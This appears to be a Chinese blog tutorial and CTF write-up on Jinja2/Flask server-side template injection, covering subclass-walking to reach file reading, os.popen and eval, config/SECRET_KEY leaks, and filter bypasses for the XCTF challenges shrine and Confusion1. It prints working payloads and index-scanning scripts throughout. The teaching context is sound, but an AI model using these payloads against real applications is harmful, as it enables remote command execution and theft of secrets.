当前位置:   article > 正文

SSTI(模板注入) 解析 和 ctf 做法_ctf ssti

ctf ssti

基础知识补充:

  • __class__ 返回类型所属的对象
  • __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
  • __base__ 返回该对象所继承的基类
  • // __base__和__mro__都是用来寻找基类的
  • __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
  • __init__ 类的初始化方法
  • __globals__ 对包含函数全局变量的字典的引用
  • __builtins__  导入内置函数,例如eval()等

一般ssti都是通过 类->基类->危险函数的使用来实现注入的

 [].__class__         获取[] 对应的类

 [].__class__.__base__           获取[]对应的类的基类

 [].__class__.base__.__subclasses__()     获取[]对应的类的基类的所有子类

 [].__class__.base__.__subclasses__()[30]('flag').read()  (假设<type file> file方法是第30,使用read()方法来读取flag文件)

 [].__class__.base__.__subclasses__()[50].__init__.__globals__['os'].system('ls')  (假设os类是第50个,初始化它并使用system函数来执行ls命令)

SSTI读取文件

python2中可以使用file类来读取文件

{{[].__class__.__base__.__subclasses__()[40]('flag').read()}}

 python3中没有file类了

可以使用<class '_frozen_importlib_external.FileLoader'>,<class ‘click.utils.LazyFile’>

<class ‘codecs.IncrementalEncoder’>来读取文件

  1. python脚本
  2. import requests
  3. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
  4. for i in range(500):
  5. url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"]}}"
  6. res = requests.get(url=url, headers=headers)
  7. if 'click.utils.LazyFile' in res.text:
  8. print(i)
  9. payload:{{[].__class__.__base__.__subclasses__()[257]('flag').read()}}

 SSTI执行命令

可以用来执行命令的类有很多,其基本原理就是遍历含有eval函数即os模块的子类,利用这些子类中的eval函数即os模块执行命令。

寻找内建函数 eval 执行命令

查询有内置函数eval的类

  1. import requests
  2. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
  3. for i in range(500):
  4. url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}"
  5. res = requests.get(url=url, headers=headers)
  6. if 'eval' in res.text:
  7. print(i)
  8. payload:{{[].__class__.__base__.__subclasses__()[58].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls").read()')}}

 寻找 os 模块执行命令

Python的 os 模块中有system和popen这两个函数可用来执行命令。其中system()函数执行命令是没有回显的,我们可以使用system()函数配合curl外带数据;popen()函数执行命令有回显。所以比较常用的函数为popen()函数,而当popen()函数被过滤掉时,可以使用system()函数代替

寻找有os模块的类

  1. import requests
  2. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
  3. for i in range(500):
  4. url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
  5. res = requests.get(url=url, headers=headers)
  6. if 'os.py' in res.text:
  7. print(i)
  8. payload:{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

寻找 importlib 类执行命令 

Python 中存在 <class '_frozen_importlib.BuiltinImporter'> 类,目的就是提供 Python 中 import 语句的实现(以及 __import__ 函数)。我么可以直接利用该类中的load_module将os模块导入,从而使用 os 模块执行命令。

也可以搜索__import__函数来导入os模块

  1. import requests
  2. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
  3. for i in range(500):
  4. url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
  5. res = requests.get(url=url, headers=headers)
  6. if '__import__' in res.text:
  7. print(i)
  8. payload:{{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('ls').read()}}

寻找 linecache 函数执行命令

inecache 这个函数可用于读取任意一个文件的某一行,而这个函数中也引入了 os 模块,所以我们也可以利用这个 linecache 函数去执行命令。

  1. import requests
  2. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
  3. for i in range(500):
  4. url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
  5. res = requests.get(url=url, headers=headers)
  6. if 'linecache' in res.text:
  7. print(i)
  8. payload={{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache']['os'].popen('ls').read()}}

config_app 

其中包含应用程序的所有配置值.在大多数情况下,这包括敏感值,例如数据库连接字符串,第三方服务的凭证,SECRET_KEY等。
例如:
url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config等
如果config,self不能使用,要获取配置信息,就必须从它的上部全局变量(访问配置current_app等)

  1. {{url_for.__globals__['current_app'].config.FLAG}}
  2. {{get_flashed_messages.__globals__['current_app'].config.FLAG}}
  3. {{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}

CTF实例

 shrine(xctf)

 url和路由

 app.route()路由可以通过app.route()中的url来访问一个具体的python类或函数

例如:

  1. from flask import Flask
  2. app = Flask(__name__) # 创建一个flask实例
  3. @app.route('/')
  4. def index():
  5. return("这里是/页面")
  6. @app.route('/flag')
  7. def flag():
  8. return("这里是falg页面")
  9. if __name__ == '__main__': # 如果是已主程序的方式启动(不是以导入模块的方式),则运行flask实例
  10. app.run() # app.run(debug=True),即可开启debug模式
  11. 这里写了两个页面url分别是/ 和 /falg

当然也可以动态的传参以及对参数的过滤

  1. # -*- coding: UTF-8 -*-
  2. from flask import Flask
  3. app = Flask(__name__) # 创建一个flask实例
  4. @app.route('/')
  5. def a():
  6. return 1
  7. @app.route('/student/<student_id>/')
  8. def student(student_id):
  9. return '学生{}号的信息'.format(student_id)
  10. @app.route('/students/<int:student_id>/')
  11. def students(student_id):
  12. return '学生{}号的信息'.format(student_id)
  13. if __name__ == '__main__': # 如果是已主程序的方式启动(不是以导入模块的方式),则运行flask实例
  14. app.run() # app.run(debug=True),即可开启debug模式

 student 页面中可以随便传参

students页面则只能穿int型数据

 源代码

  1. import flask
  2. import os
  3. app = flask.Flask(__name__)
  4. app.config['FLAG'] = os.environ.pop('FLAG')
  5. @app.route('/')
  6. def index():
  7. return open(__file__).read()
  8. @app.route('/shrine/<path:shrine>')
  9. def shrine(shrine):
  10. def safe_jinja(s):
  11. s = s.replace('(', '').replace(')', '')
  12. blacklist = ['config', 'self']
  13. return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
  14. return flask.render_template_string(safe_jinja(shrine))
  15. if __name__ == '__main__':
  16. app.run(debug=True)
app.config['FLAG'] = os.environ.pop('FLAG')

从环境变量中删除FALG变量并返回值给config

 s = s.replace('(', '').replace(')', '')

将() 替换为空

 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

将config,self 替换为None

分析:

如果没有过滤config

可以使用{{config.FLAG}}

如果没有过滤self

可以使用{{self.__dict__}},里面有所有字典的键与值

如果没有过滤()

可以使用subclasses()

payload:

url_for.__globals__['current_app'].config.FLAG

(为什么这里的config没有被过滤,不清楚)

Web_python_template_injection

存在ssti注入

 写脚本查询包含有os模块的索引

  1. import requests
  2. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
  3. for i in range(500):
  4. url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
  5. res = requests.get(url=url, headers=headers)
  6. if 'os.py' in res.text:
  7. print(i)

构造payload: 

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

使用file类读取拿到flag

{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

Confusion1

输入{{2*3}} 结果为6,存在ssti漏洞

 

flag位置给出

发现关键词 class base read 被过滤

  • 使用引号绕过

__class__  ->  ["__cla""ss__"]

构造payload

()["__cla""ss__"]["__ba""se__"]["__subclas""ses__"]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')["re""ad"]()

拿到flag 

  •  使用request绕过

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/403208
推荐阅读
相关标签
  

闽ICP备14008679号